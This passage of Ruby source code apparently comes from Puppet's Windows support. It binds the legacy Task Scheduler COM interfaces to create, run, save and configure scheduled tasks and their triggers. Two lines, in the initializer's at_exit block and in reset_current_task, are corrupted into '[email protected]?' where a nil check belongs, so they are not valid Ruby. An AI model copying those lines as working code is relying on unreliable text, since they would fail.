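#               'trigger_type' => Win32::TaskScheduler::ONCE }
#   ts = Win32::TaskScheduler.new('PuppetExampleTask', trigger)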
#
def initialize(work_item = nil, trigger = nil)
@pits = nil
@pitask = nil
unless self.class.com_initialized
Puppet::Util::Windows::COM.InitializeCom()
self.class.com_initialized = true
end
@pits = COM::TaskScheduler.new
at_exit do
begin
@pits.Release if @pits && [email protected]?
@pits = nil
rescue # rubocop:disable Lint/SuppressedException
end
end
raise TypeError if work_item && trigger && !trigger.is_a?(Hash)
new_work_item(work_item, trigger) if work_item && trigger
end
# Returns an array of scheduled task names.
#
def enum
raise Error, _('No current task scheduler. ITaskScheduler is NULL.') if @pits.nil?
array = []
@pits.UseInstance(COM::EnumWorkItems, :Enum) do |pi_enum|
FFI::MemoryPointer.new(:pointer) do |names_array_ptr_ptr|
FFI::MemoryPointer.new(:win32_ulong) do |fetched_count_ptr|
# awkward usage, if number requested is available, returns S_OK (0), or if less were returned returns S_FALSE (1)
while pi_enum.Next(TASKS_TO_RETRIEVE, names_array_ptr_ptr, fetched_count_ptr) >= Puppet::Util::Windows::COM::S_OK
count = fetched_count_ptr.read_win32_ulong
break if count == 0
names_array_ptr_ptr.read_com_memory_pointer do |names_array_ptr|
# iterate over the array of pointers
name_ptr_ptr = FFI::Pointer.new(:pointer, names_array_ptr)
(0...count).each do |i|
name_ptr_ptr[i].read_com_memory_pointer do |name_ptr|
array << name_ptr.read_arbitrary_wide_string_up_to(MAX_PATH)
end
end
end
end
end
end
end
array
end
alias tasks enum
# Activate the specified task.
#
def activate(task)
raise Error, _('No current task scheduler. ITaskScheduler is NULL.') if @pits.nil?
raise TypeError unless task.is_a?(String)
FFI::MemoryPointer.new(:pointer) do |ptr|
@pits.Activate(wide_string(task), IID_ITask, ptr)
reset_current_task
@pitask = COM::Task.new(ptr.read_pointer)
end
@pitask
end
# Delete the specified task name.
#
def delete(task)
raise Error, _('No current task scheduler. ITaskScheduler is NULL.') if @pits.nil?
raise TypeError unless task.is_a?(String)
@pits.Delete(wide_string(task))
true
end
# Execute the current task.
#
def run
raise Error, _('No currently active task. ITask is NULL.') if @pitask.nil?
@pitask.Run
end
# Saves the current task. Tasks must be saved before they can be activated.
# The .job file itself is typically stored in the C:\WINDOWS\Tasks folder.
#
# If +file+ (an absolute path) is specified then the job is saved to that
# file instead. A '.job' extension is recommended but not enforced.
#
def save(file = nil)
raise Error, _('No currently active task. ITask is NULL.') if @pitask.nil?
raise Error, _('Account information must be set on the current task to save it properly.') unless @account_information_set
reset = true
begin
@pitask.QueryInstance(COM::PersistFile) do |pi_persist_file|
wide_file = wide_string(file)
pi_persist_file.Save(wide_file, 1)
pi_persist_file.SaveCompleted(wide_file)
end
rescue
reset = false
ensure
reset_current_task if reset
end
end
# Terminate the current task.
#
def terminate
raise Error, _('No currently active task. ITask is NULL.') if @pitask.nil?
@pitask.Terminate
end
# Set the host on which the various TaskScheduler methods will execute.
#
def machine=(host)
raise Error, _('No current task scheduler. ITaskScheduler is NULL.') if @pits.nil?
raise TypeError unless host.is_a?(String)
@pits.SetTargetComputer(wide_string(host))
host
end
alias host= machine=
# Sets the +user+ and +password+ for the given task. If the user and
# password are set properly then true is returned.
#
# In some cases the job may be created, but the account information was
# bad. In this case the task is created but a warning is generated and
# false is returned.
#
# Note that if intending to use SYSTEM, specify an empty user and nil password
#
# Calling task.set_account_information('SYSTEM', nil) will generally not
# work, except for one special case where flags are also set like:
# task.flags = Win32::TaskScheduler::TASK_FLAG_RUN_ONLY_IF_LOGGED_ON
#
# This must be done prior to the 1st save() call for the task to be
# properly registered and visible through the MMC snap-in / schtasks.exe
#
def set_account_information(user, password)
raise Error, _('No current task scheduler. ITaskScheduler is NULL.') if @pits.nil?
raise Error, _('No currently active task. ITask is NULL.') if @pitask.nil?
bool = false
begin
if (user.nil? || user == '') && (password.nil? || password == '')
@pitask.SetAccountInformation(wide_string(''), FFI::Pointer::NULL)
else
if user.length > MAX_ACCOUNT_LENGTH
raise Error, _('User has exceeded maximum allowed length %{max}') % { max: MAX_ACCOUNT_LENGTH }
end
user = wide_string(user)
password = wide_string(password)
@pitask.SetAccountInformation(user, password)
end
@account_information_set = true
bool = true
rescue Puppet::Util::Windows::Error => e
raise e unless e.code == SCHED_E_ACCOUNT_INFORMATION_NOT_SET
warn _('job created, but password was invalid')
end
bool
end
# Returns the user associated with the task or nil if no user has yet
# been associated with the task.
#
def account_information
raise Error, _('No current task scheduler. ITaskScheduler is NULL.') if @pits.nil?
raise Error, _('No currently active task. ITask is NULL.') if @pitask.nil?
# default under certain failures
user = nil
begin
FFI::MemoryPointer.new(:pointer) do |ptr|
@pitask.GetAccountInformation(ptr)
ptr.read_com_memory_pointer do |str_ptr|
user = str_ptr.read_arbitrary_wide_string_up_to(MAX_ACCOUNT_LENGTH) unless str_ptr.null?
end
end
rescue Puppet::Util::Windows::Error => e
raise e unless e.code == SCHED_E_ACCOUNT_INFORMATION_NOT_SET ||
e.code == SCHED_E_NO_SECURITY_SERVICES ||
e.code == ERROR_NONE_MAPPED
end
user
end
# Returns the name of the application associated with the task.
#
def application_name
raise Error, _('No current task scheduler. ITaskScheduler is NULL.') if @pits.nil?
raise Error, _('No currently active task. ITask is NULL.') if @pitask.nil?
app = nil
FFI::MemoryPointer.new(:pointer) do |ptr|
@pitask.GetApplicationName(ptr)
ptr.read_com_memory_pointer do |str_ptr|
app = str_ptr.read_arbitrary_wide_string_up_to(MAX_PATH) unless str_ptr.null?
end
end
app
end
# Sets the application name associated with the task.
#
def application_name=(app)
raise Error, _('No current task scheduler. ITaskScheduler is NULL.') if @pits.nil?
raise Error, _('No currently active task. ITask is NULL.') if @pitask.nil?
raise TypeError unless app.is_a?(String)
# the application name is written to a .job file on disk, so is subject to path limitations
if app.length > MAX_PATH
raise Error, _('Application name has exceeded maximum allowed length %{max}') % { max: MAX_PATH }
end
@pitask.SetApplicationName(wide_string(app))
app
end
# Returns the command line parameters for the task.
#
def parameters
raise Error, _('No current task scheduler. ITaskScheduler is NULL.') if @pits.nil?
raise Error, _('No currently active task. ITask is NULL.') if @pitask.nil?
param = nil
FFI::MemoryPointer.new(:pointer) do |ptr|
@pitask.GetParameters(ptr)
ptr.read_com_memory_pointer do |str_ptr|
param = str_ptr.read_arbitrary_wide_string_up_to(MAX_PARAMETERS_LENGTH) unless str_ptr.null?
end
end
param
end
# Sets the parameters for the task. These parameters are passed as command
# line arguments to the application the task will run. To clear the command
# line parameters set it to an empty string.
#
def parameters=(param)
raise Error, _('No current task scheduler. ITaskScheduler is NULL.') if @pits.nil?
raise Error, _('No currently active task. ITask is NULL.') if @pitask.nil?
raise TypeError unless param.is_a?(String)
if param.length > MAX_PARAMETERS_LENGTH
raise Error, _('Parameters has exceeded maximum allowed length %{max}') % { max: MAX_PARAMETERS_LENGTH }
end
@pitask.SetParameters(wide_string(param))
param
end
# Returns the working directory for the task.
#
def working_directory
raise Error, _('No current task scheduler. ITaskScheduler is NULL.') if @pits.nil?
raise Error, _('No currently active task. ITask is NULL.') if @pitask.nil?
dir = nil
FFI::MemoryPointer.new(:pointer) do |ptr|
@pitask.GetWorkingDirectory(ptr)
ptr.read_com_memory_pointer do |str_ptr|
dir = str_ptr.read_arbitrary_wide_string_up_to(MAX_PATH) unless str_ptr.null?
end
end
dir
end
# Sets the working directory for the task.
#
def working_directory=(dir)
raise Error, _('No current task scheduler. ITaskScheduler is NULL.') if @pits.nil?
raise Error, _('No currently active task. ITask is NULL.') if @pitask.nil?
raise TypeError unless dir.is_a?(String)
if dir.length > MAX_PATH
raise Error, _('Working directory has exceeded maximum allowed length %{max}') % { max: MAX_PATH }
end
@pitask.SetWorkingDirectory(wide_string(dir))
dir
end
# Returns the task's priority level. Possible values are 'idle',
# 'normal', 'high', 'realtime', 'below_normal', 'above_normal',
# and 'unknown'.
#
def priority
raise Error, _('No current task scheduler. ITaskScheduler is NULL.') if @pits.nil?
raise Error, _('No currently active task. ITask is NULL.') if @pitask.nil?
priority_name = ''
FFI::MemoryPointer.new(:dword, 1) do |ptr|
@pitask.GetPriority(ptr)
pri = ptr.read_dword
priority_name = if (pri & IDLE) != 0
'idle'
elsif (pri & NORMAL) != 0
'normal'
elsif (pri & HIGH) != 0
'high'
elsif (pri & REALTIME) != 0
'realtime'
elsif (pri & BELOW_NORMAL) != 0
'below_normal'
elsif (pri & ABOVE_NORMAL) != 0
'above_normal'
else
'unknown'
end
end
priority_name
end
# Sets the priority of the task. The +priority+ should be a numeric
# priority constant value.
#
def priority=(priority)
raise Error, _('No current task scheduler. ITaskScheduler is NULL.') if @pits.nil?
raise Error, _('No currently active task. ITask is NULL.') if @pitask.nil?
raise TypeError unless priority.is_a?(Numeric)
@pitask.SetPriority(priority)
priority
end
# Creates a new work item (scheduled job) with the given +trigger+. The
# trigger variable is a hash of options that define when the scheduled
# job should run.
#
def new_work_item(task, trigger)
raise TypeError unless trigger.is_a?(Hash)
raise Error, _('No current task scheduler. ITaskScheduler is NULL.') if @pits.nil?
# I'm working around github issue #1 here.
enum.each do |name|
if name.downcase == task.downcase + '.job'
raise Error, _("task '%{task}' already exists") % { task: task }
end
end
FFI::MemoryPointer.new(:pointer) do |ptr|
@pits.NewWorkItem(wide_string(task), CLSID_CTask, IID_ITask, ptr)
reset_current_task
@pitask = COM::Task.new(ptr.read_pointer)
FFI::MemoryPointer.new(:word, 1) do |trigger_index_ptr|
# Without the 'enum.include?' check above the code segfaults here if the
# task already exists. This should probably be handled properly instead
# of simply avoiding the issue.
@pitask.UseInstance(COM::TaskTrigger, :CreateTrigger, trigger_index_ptr) do |pitask_trigger|
populate_trigger(pitask_trigger, trigger)
end
end
end
# preload task with the SYSTEM account
# empty string '' means 'SYSTEM' per MSDN, so default it
# given an account is necessary for creation of a task
# note that a user may set SYSTEM explicitly, but that has problems
# https://msdn.microsoft.com/en-us/library/windows/desktop/aa381276(v=vs.85).aspx
set_account_information('', nil)
@pitask
end
alias new_task new_work_item
# Returns the number of triggers associated with the active task.
#
def trigger_count
raise Error, _('No current task scheduler. ITaskScheduler is NULL.') if @pits.nil?
raise Error, _('No currently active task. ITask is NULL.') if @pitask.nil?
count = 0
FFI::MemoryPointer.new(:word, 1) do |ptr|
@pitask.GetTriggerCount(ptr)
count = ptr.read_word
end
count
end
# Deletes the trigger at the specified index.
#
def delete_trigger(index)
raise Error, _('No current task scheduler. ITaskScheduler is NULL.') if @pits.nil?
raise Error, _('No currently active task. ITask is NULL.') if @pitask.nil?
@pitask.DeleteTrigger(index)
index
end
# Returns a hash that describes the trigger at the given index for the
# current task.
#
def trigger(index)
raise Error, _('No current task scheduler. ITaskScheduler is NULL.') if @pits.nil?
raise Error, _('No currently active task. ITask is NULL.') if @pitask.nil?
trigger = {}
@pitask.UseInstance(COM::TaskTrigger, :GetTrigger, index) do |pitask_trigger|
FFI::MemoryPointer.new(COM::TASK_TRIGGER.size) do |task_trigger_ptr|
pitask_trigger.GetTrigger(task_trigger_ptr)
trigger = populate_hash_from_trigger(COM::TASK_TRIGGER.new(task_trigger_ptr))
end
end
trigger
end
# Sets the trigger for the currently active task.
#
def trigger=(trigger)
raise Error, _('No current task scheduler. ITaskScheduler is NULL.') if @pits.nil?
raise Error, _('No currently active task. ITask is NULL.') if @pitask.nil?
raise TypeError unless trigger.is_a?(Hash)
FFI::MemoryPointer.new(:word, 1) do |trigger_index_ptr|
# Without the 'enum.include?' check above the code segfaults here if the
# task already exists. This should probably be handled properly instead
# of simply avoiding the issue.
@pitask.UseInstance(COM::TaskTrigger, :CreateTrigger, trigger_index_ptr) do |pitask_trigger|
populate_trigger(pitask_trigger, trigger)
end
end
trigger
end
# Adds a trigger at the specified index.
#
def add_trigger(index, trigger)
raise Error, _('No current task scheduler. ITaskScheduler is NULL.') if @pits.nil?
raise Error, _('No currently active task. ITask is NULL.') if @pitask.nil?
raise TypeError unless trigger.is_a?(Hash)
@pitask.UseInstance(COM::TaskTrigger, :GetTrigger, index) do |pitask_trigger|
populate_trigger(pitask_trigger, trigger)
end
end
# Returns the flags (integer) that modify the behavior of the work item. You
# must OR the return value to determine the flags yourself.
#
def flags
raise Error, _('No currently active task. ITask is NULL.') if @pitask.nil?
flags = 0
FFI::MemoryPointer.new(:dword, 1) do |ptr|
@pitask.GetFlags(ptr)
flags = ptr.read_dword
end
flags
end
# Sets an OR'd value of flags that modify the behavior of the work item.
#
def flags=(flags)
raise Error, _('No current task scheduler. ITaskScheduler is NULL.') if @pits.nil?
raise Error, _('No currently active task. ITask is NULL.') if @pitask.nil?
@pitask.SetFlags(flags)
flags
end
# Returns the status of the currently active task. Possible values are
# 'ready', 'running', 'not scheduled' or 'unknown'.
#
def status
raise Error, _('No currently active task. ITask is NULL.') if @pitask.nil?
st = nil
FFI::MemoryPointer.new(:hresult, 1) do |ptr|
@pitask.GetStatus(ptr)
st = ptr.read_hresult
end
status = case st
when SCHED_S_TASK_READY
'ready'
when SCHED_S_TASK_RUNNING
'running'
when SCHED_S_TASK_NOT_SCHEDULED
'not scheduled'
else
'unknown'
end
status
end
# Returns the exit code from the last scheduled run.
#
def exit_code
raise Error, _('No currently active task. ITask is NULL.') if @pitask.nil?
status = 0
begin
FFI::MemoryPointer.new(:dword, 1) do |ptr|
@pitask.GetExitCode(ptr)
status = ptr.read_dword
end
rescue Puppet::Util::Windows::Error => e
raise e unless e.code == SCHED_S_TASK_HAS_NOT_RUN
end
status
end
# Returns the comment associated with the task, if any.
#
def comment
raise Error, _('No currently active task. ITask is NULL.') if @pitask.nil?
comment = nil
FFI::MemoryPointer.new(:pointer) do |ptr|
@pitask.GetComment(ptr)
ptr.read_com_memory_pointer do |str_ptr|
comment = str_ptr.read_arbitrary_wide_string_up_to(MAX_COMMENT_LENGTH) unless str_ptr.null?
end
end
comment
end
# Sets the comment for the task.
#
def comment=(comment)
raise Error, _('No currently active task. ITask is NULL.') if @pitask.nil?
raise TypeError unless comment.is_a?(String)
if comment.length > MAX_COMMENT_LENGTH
raise Error, _('Comment has exceeded maximum allowed length %{max}') % { max: MAX_COMMENT_LENGTH }
end
@pitask.SetComment(wide_string(comment))
comment
end
# Returns the name of the user who created the task.
#
def creator
raise Error, _('No currently active task. ITask is NULL.') if @pitask.nil?
creator = nil
FFI::MemoryPointer.new(:pointer) do |ptr|
@pitask.GetCreator(ptr)
ptr.read_com_memory_pointer do |str_ptr|
creator = str_ptr.read_arbitrary_wide_string_up_to(MAX_ACCOUNT_LENGTH) unless str_ptr.null?
end
end
creator
end
# Sets the creator for the task.
#
def creator=(creator)
raise Error, _('No currently active task. ITask is NULL.') if @pitask.nil?
raise TypeError unless creator.is_a?(String)
if creator.length > MAX_ACCOUNT_LENGTH
raise Error, _('Creator has exceeded maximum allowed length %{max}') % { max: MAX_ACCOUNT_LENGTH }
end
@pitask.SetCreator(wide_string(creator))
creator
end
# Returns a Time object that indicates the next time the task will run.
#
def next_run_time
raise Error, _('No currently active task. ITask is NULL.') if @pitask.nil?
time = nil
FFI::MemoryPointer.new(WIN32::SYSTEMTIME.size) do |ptr|
@pitask.GetNextRunTime(ptr)
time = WIN32::SYSTEMTIME.new(ptr).to_local_time
end
time
end
# Returns a Time object indicating the most recent time the task ran or
# nil if the task has never run.
#
def most_recent_run_time
raise Error, _('No currently active task. ITask is NULL.') if @pitask.nil?
time = nil
begin
FFI::MemoryPointer.new(WIN32::SYSTEMTIME.size) do |ptr|
@pitask.GetMostRecentRunTime(ptr)
time = WIN32::SYSTEMTIME.new(ptr).to_local_time
end
rescue Puppet::Util::Windows::Error => e
raise e unless e.code == SCHED_S_TASK_HAS_NOT_RUN
end
time
end
# Returns the maximum length of time, in milliseconds, that the task
# will run before terminating.
#
def max_run_time
raise Error, _('No currently active task. ITask is NULL.') if @pitask.nil?
max_run_time = nil
FFI::MemoryPointer.new(:dword, 1) do |ptr|
@pitask.GetMaxRunTime(ptr)
max_run_time = ptr.read_dword
end
max_run_time
end
# Sets the maximum length of time, in milliseconds, that the task can run
# before terminating. Returns the value you specified if successful.
#
def max_run_time=(max_run_time)
raise Error, _('No currently active task. ITask is NULL.') if @pitask.nil?
raise TypeError unless max_run_time.is_a?(Numeric)
@pitask.SetMaxRunTime(max_run_time)
max_run_time
end
# Returns whether or not the scheduled task exists.
def exists?(job_name)
# task name comparison is case insensitive
tasks.any? { |name| name.casecmp(job_name + '.job') == 0 }
end
private
# :stopdoc:
# Used for the new_work_item method
ValidTriggerKeys = [
'end_day',
'end_month',
'end_year',
'flags',
'minutes_duration',
'minutes_interval',
'random_minutes_interval',
'start_day',
'start_hour',
'start_minute',
'start_month',
'start_year',
'trigger_type',
'type',
].freeze
ValidTypeKeys = [
'days_interval',
'weeks_interval',
'days_of_week',
'months',
'days',
'weeks',
].freeze
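# Example trigger hash accepted by trigger= / populate_trigger (hypothetical values):
#   { 'trigger_type' => :TASK_TIME_TRIGGER_WEEKLY,
#     'start_hour'   => 3,
#     'type'         => { 'weeks_interval' => 1, 'days_of_week' => TASK_MONDAY } }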
# Private method that validates keys, and converts all keys to lowercase
# strings.
#
def transform_and_validate(hash)
new_hash = {}
hash.each do |key, value|
key = key.to_s.downcase
if key == 'type'
new_type_hash = {}
raise ArgumentError unless value.is_a?(Hash)
value.each do |subkey, subvalue|
subkey = subkey.to_s.downcase
raise ArgumentError, _("Invalid type key '%{key}'") % { key: subkey } unless ValidTypeKeys.include?(subkey)
new_type_hash[subkey] = subvalue
end
new_hash[key] = new_type_hash
elsif ValidTriggerKeys.include?(key)
new_hash[key] = value
else
raise ArgumentError, _("Invalid key '%{key}'") % { key: key }
end
end
new_hash
end
def reset_current_task
# Ensure that COM reference is decremented properly
@pitask.Release if @pitask && [email protected]?
@pitask = nil
@account_information_set = false
end
def populate_trigger(task_trigger, trigger)
raise TypeError unless task_trigger.is_a?(COM::TaskTrigger)
trigger = transform_and_validate(trigger)
FFI::MemoryPointer.new(COM::TASK_TRIGGER.size) do |trigger_ptr|
FFI::MemoryPointer.new(COM::TRIGGER_TYPE_UNION.size) do |trigger_type_union_ptr|
trigger_type_union = COM::TRIGGER_TYPE_UNION.new(trigger_type_union_ptr)
tmp = trigger['type'].is_a?(Hash) ? trigger['type'] : nil
case trigger['trigger_type']
when :TASK_TIME_TRIGGER_DAILY
if tmp && tmp['days_interval']
trigger_type_union[:Daily][:DaysInterval] = tmp['days_interval']
end
when :TASK_TIME_TRIGGER_WEEKLY
if tmp && tmp['weeks_interval'] && tmp['days_of_week']
trigger_type_union[:Weekly][:WeeksInterval] = tmp['weeks_interval']
trigger_type_union[:Weekly][:rgfDaysOfTheWeek] = tmp['days_of_week']
end
when :TASK_TIME_TRIGGER_MONTHLYDATE
if tmp && tmp['months'] && tmp['days']
trigger_type_union[:MonthlyDate][:rgfDays] = tmp['days']
trigger_type_union[:MonthlyDate][:rgfMonths] = tmp['months']
end
when :TASK_TIME_TRIGGER_MONTHLYDOW
if tmp && tmp['weeks'] && tmp['days_of_week'] && tmp['months']
trigger_type_union[:MonthlyDOW][:wWhichWeek] = tmp['weeks']
trigger_type_union[:MonthlyDOW][:rgfDaysOfTheWeek] = tmp['days_of_week']
trigger_type_union[:MonthlyDOW][:rgfMonths] = tmp['months']
end
when :TASK_TIME_TRIGGER_ONCE
# Do nothing. The Type member of the TASK_TRIGGER struct is ignored.
nil
else
raise Error, _('Unknown trigger type %{type}') % { type: trigger['trigger_type'] }
end
trigger_struct = COM::TASK_TRIGGER.new(trigger_ptr)
trigger_struct[:cbTriggerSize] = COM::TASK_TRIGGER.size
now = Time.now
trigger_struct[:wBeginYear] = trigger['start_year'] || now.year
trigger_struct[:wBeginMonth] = trigger['start_month'] || now.month
trigger_struct[:wBeginDay] = trigger['start_day'] || now.day
trigger_struct[:wEndYear] = trigger['end_year'] || 0
trigger_struct[:wEndMonth] = trigger['end_month'] || 0
trigger_struct[:wEndDay] = trigger['end_day'] || 0
trigger_struct[:wStartHour] = trigger['start_hour'] || 0
trigger_struct[:wStartMinute] = trigger['start_minute'] || 0
trigger_struct[:MinutesDuration] = trigger['minutes_duration'] || 0
trigger_struct[:MinutesInterval] = trigger['minutes_interval'] || 0
trigger_struct[:rgFlags] = trigger['flags'] || 0
trigger_struct[:TriggerType] = trigger['trigger_type'] || :TASK_TIME_TRIGGER_ONCE
trigger_struct[:Type] = trigger_type_union
trigger_struct[:wRandomMinutesInterval] = trigger['random_minutes_interval'] || 0
task_trigger.SetTrigger(trigger_struct)
end
end
end
def populate_hash_from_trigger(task_trigger)
raise TypeError unless task_trigger.is_a?(COM::TASK_TRIGGER)
trigger = {
'start_year' => task_trigger[:wBeginYear],
'start_month' => task_trigger[:wBeginMonth],
'start_day' => task_trigger[:wBeginDay],
'end_year' => task_trigger[:wEndYear],
'end_month' => task_trigger[:wEndMonth],
'end_day' => task_trigger[:wEndDay],
'start_hour' => task_trigger[:wStartHour],
'start_minute' => task_trigger[:wStartMinute],
'minutes_duration' => task_trigger[:MinutesDuration],
'minutes_interval' => task_trigger[:MinutesInterval],
'flags' => task_trigger[:rgFlags],
'trigger_type' => task_trigger[:TriggerType],
'random_minutes_interval' => task_trigger[:wRandomMinutesInterval],
}
case task_trigger[:TriggerType]
when :TASK_TIME_TRIGGER_DAILY
trigger['type'] = { 'days_interval' => task_trigger[:Type][:Daily][:DaysInterval] }
when :TASK_TIME_TRIGGER_WEEKLY
trigger['type'] = {
'weeks_interval' => task_trigger[:Type][:Weekly][:WeeksInterval],
'days_of_week' => task_trigger[:Type][:Weekly][:rgfDaysOfTheWeek],
}
when :TASK_TIME_TRIGGER_MONTHLYDATE
trigger['type'] = {
'days' => task_trigger[:Type][:MonthlyDate][:rgfDays],
'months' => task_trigger[:Type][:MonthlyDate][:rgfMonths],
}
when :TASK_TIME_TRIGGER_MONTHLYDOW
trigger['type'] = {
'weeks' => task_trigger[:Type][:MonthlyDOW][:wWhichWeek],
'days_of_week' => task_trigger[:Type][:MonthlyDOW][:rgfDaysOfTheWeek],
'months' => task_trigger[:Type][:MonthlyDOW][:rgfMonths],
}
when :TASK_TIME_TRIGGER_ONCE
trigger['type'] = { 'once' => nil }
else
raise Error, _('Unknown trigger type %{type}') % { type: task_trigger[:TriggerType] }
end
trigger
end
module COM
extend FFI::Library
com = Puppet::Util::Windows::COM
# https://msdn.microsoft.com/en-us/library/windows/desktop/aa381811(v=vs.85).aspx
ITaskScheduler = com::Interface[com::IUnknown,
FFI::WIN32::GUID['148BD527-A2AB-11CE-B11F-00AA00530503'],
SetTargetComputer: [[:lpcwstr], :hresult],
# LPWSTR *
GetTargetComputer: [[:pointer], :hresult],
# IEnumWorkItems **
Enum: [[:pointer], :hresult],
# LPCWSTR, REFIID, IUnknown **
Activate: [[:lpcwstr, :pointer, :pointer], :hresult],
Delete: [[:lpcwstr], :hresult],
# LPCWSTR, REFCLSID, REFIID, IUnknown **
NewWorkItem: [[:lpcwstr, :pointer, :pointer, :pointer], :hresult],
# LPCWSTR, IScheduledWorkItem *
AddWorkItem: [[:lpcwstr, :pointer], :hresult],
# LPCWSTR, REFIID
IsOfType: [[:lpcwstr, :pointer], :hresult]
]
TaskScheduler = com::Factory[ITaskScheduler,
FFI::WIN32::GUID['148BD52A-A2AB-11CE-B11F-00AA00530503']]
# https://msdn.microsoft.com/en-us/library/windows/desktop/aa380706(v=vs.85).aspx
IEnumWorkItems = com::Interface[com::IUnknown,
FFI::WIN32::GUID['148BD528-A2AB-11CE-B11F-00AA00530503'],
# ULONG, LPWSTR **, ULONG *
Next: [[:win32_ulong, :pointer, :pointer], :hresult],
Skip: [[:win32_ulong], :hresult],
Reset: [[], :hresult],
# IEnumWorkItems ** ppEnumWorkItems
Clone: [[:pointer], :hresult]
]
EnumWorkItems = com::Instance[IEnumWorkItems]
# https://msdn.microsoft.com/en-us/library/windows/desktop/aa381216(v=vs.85).aspx
IScheduledWorkItem = com::Interface[com::IUnknown,
FFI::WIN32::GUID['a6b952f0-a4b1-11d0-997d-00aa006887ec'],
# WORD *, ITaskTrigger **
CreateTrigger: [[:pointer, :pointer], :hresult],
DeleteTrigger: [[:word], :hresult],
# WORD *
GetTriggerCount: [[:pointer], :hresult],
# WORD, ITaskTrigger **
GetTrigger: [[:word, :pointer], :hresult],
# WORD, LPWSTR *
GetTriggerString: [[:word, :pointer], :hresult],
# LPSYSTEMTIME, LPSYSTEMTIME, WORD *, LPSYSTEMTIME *
GetRunTimes: [[:pointer, :pointer, :pointer, :pointer], :hresult],
# SYSTEMTIME *
GetNextRunTime: [[:pointer], :hresult],
SetIdleWait: [[:word, :word], :hresult],
# WORD *, WORD *
GetIdleWait: [[:pointer, :pointer], :hresult],
Run: [[], :hresult],
Terminate: [[], :hresult],
EditWorkItem: [[:hwnd, :dword], :hresult],
# SYSTEMTIME *
GetMostRecentRunTime: [[:pointer], :hresult],
# HRESULT *
GetStatus: [[:pointer], :hresult],
GetExitCode: [[:pdword], :hresult],
SetComment: [[:lpcwstr], :hresult],
# LPWSTR *
GetComment: [[:pointer], :hresult],
SetCreator: [[:lpcwstr], :hresult],
# LPWSTR *
GetCreator: [[:pointer], :hresult],
# WORD, BYTE[]
SetWorkItemData: [[:word, :buffer_in], :hresult],
# WORD *, BYTE **
GetWorkItemData: [[:pointer, :pointer], :hresult],
SetErrorRetryCount: [[:word], :hresult],
# WORD *
GetErrorRetryCount: [[:pointer], :hresult],
SetErrorRetryInterval: [[:word], :hresult],
# WORD *
GetErrorRetryInterval: [[:pointer], :hresult],
SetFlags: [[:dword], :hresult],
# WORD *
GetFlags: [[:pointer], :hresult],
SetAccountInformation: [[:lpcwstr, :lpcwstr], :hresult],
# LPWSTR *
GetAccountInformation: [[:pointer], :hresult]
]
# https://msdn.microsoft.com/en-us/library/windows/desktop/aa381311(v=vs.85).aspx
ITask = com::Interface[IScheduledWorkItem,
FFI::WIN32::GUID['148BD524-A2AB-11CE-B11F-00AA00530503'],
SetApplicationName: [[:lpcwstr], :hresult],
# LPWSTR *
GetApplicationName: [[:pointer], :hresult],
SetParameters: [[:lpcwstr], :hresult],
# LPWSTR *
GetParameters: [[:pointer], :hresult],
SetWorkingDirectory: [[:lpcwstr], :hresult],
# LPWSTR *
GetWorkingDirectory: [[:pointer], :hresult],
SetPriority: [[:dword], :hresult],
# DWORD *
GetPriority: [[:pointer], :hresult],
SetTaskFlags: [[:dword], :hresult],
# DWORD *
GetTaskFlags: [[:pointer], :hresult],
SetMaxRunTime: [[:dword], :hresult],
# DWORD *
GetMaxRunTime: [[:pointer], :hresult]
]
Task = com::Instance[ITask]
# https://msdn.microsoft.com/en-us/library/windows/desktop/ms688695(v=vs.85).aspx
IPersist = com::Interface[com::IUnknown,
FFI::WIN32::GUID['0000010c-0000-0000-c000-000000000046'],
# CLSID *
GetClassID: [[:pointer], :hresult]
]
# https://msdn.microsoft.com/en-us/library/windows/desktop/ms687223(v=vs.85).aspx
IPersistFile = com::Interface[IPersist,
FFI::WIN32::GUID['0000010b-0000-0000-C000-000000000046'],
IsDirty: [[], :hresult],
Load: [[:lpcolestr, :dword], :hresult],
Save: [[:lpcolestr, :win32_bool], :hresult],
SaveCompleted: [[:lpcolestr], :hresult],
# LPOLESTR *
GetCurFile: [[:pointer], :hresult]
]
PersistFile = com::Instance[IPersistFile]
# https://msdn.microsoft.com/en-us/library/windows/desktop/aa381864(v=vs.85).aspx
ITaskTrigger = com::Interface[com::IUnknown,
FFI::WIN32::GUID['148BD52B-A2AB-11CE-B11F-00AA00530503'],
SetTrigger: [[:pointer], :hresult],
GetTrigger: [[:pointer], :hresult],
GetTriggerString: [[:pointer], :hresult]
]
TaskTrigger = com::Instance[ITaskTrigger]
# https://msdn.microsoft.com/en-us/library/windows/desktop/aa383620(v=vs.85).aspx
# The TASK_TRIGGER_TYPE field of the TASK_TRIGGER structure determines
# which member of the TRIGGER_TYPE_UNION field to use.
TASK_TRIGGER_TYPE = enum(
:TASK_TIME_TRIGGER_ONCE, 0, # Ignore the Type field
:TASK_TIME_TRIGGER_DAILY, 1,
:TASK_TIME_TRIGGER_WEEKLY, 2,
:TASK_TIME_TRIGGER_MONTHLYDATE, 3,
:TASK_TIME_TRIGGER_MONTHLYDOW, 4,
:TASK_EVENT_TRIGGER_ON_IDLE, 5, # Ignore the Type field
:TASK_EVENT_TRIGGER_AT_SYSTEMSTART, 6, # Ignore the Type field
:TASK_EVENT_TRIGGER_AT_LOGON, 7 # Ignore the Type field
)
# https://msdn.microsoft.com/en-us/library/windows/desktop/aa446857(v=vs.85).aspx
class DAILY < FFI::Struct
layout :DaysInterval, :word
end
# https://msdn.microsoft.com/en-us/library/windows/desktop/aa384014(v=vs.85).aspx
class WEEKLY < FFI::Struct
layout :WeeksInterval, :word,
:rgfDaysOfTheWeek, :word
end
# https://msdn.microsoft.com/en-us/library/windows/desktop/aa381918(v=vs.85).aspx
class MONTHLYDATE < FFI::Struct
layout :rgfDays, :dword,
:rgfMonths, :word
end
# https://msdn.microsoft.com/en-us/library/windows/desktop/aa381918(v=vs.85).aspx
class MONTHLYDOW < FFI::Struct
layout :wWhichWeek, :word,
:rgfDaysOfTheWeek, :word,
:rgfMonths, :word
end
# https://msdn.microsoft.com/en-us/library/windows/desktop/aa384002(v=vs.85).aspx
class TRIGGER_TYPE_UNION < FFI::Union
layout :Daily, DAILY,
:Weekly, WEEKLY,
:MonthlyDate, MONTHLYDATE,
:MonthlyDOW, MONTHLYDOW
end
# https://msdn.microsoft.com/en-us/library/windows/desktop/aa383618(v=vs.85).aspx
class TASK_TRIGGER < FFI::Struct
layout :cbTriggerSize, :word, # Structure size.
:Reserved1, :word, # Reserved. Must be zero.
:wBeginYear, :word, # Trigger beginning date year.
:wBeginMonth, :word, # Trigger beginning date month.
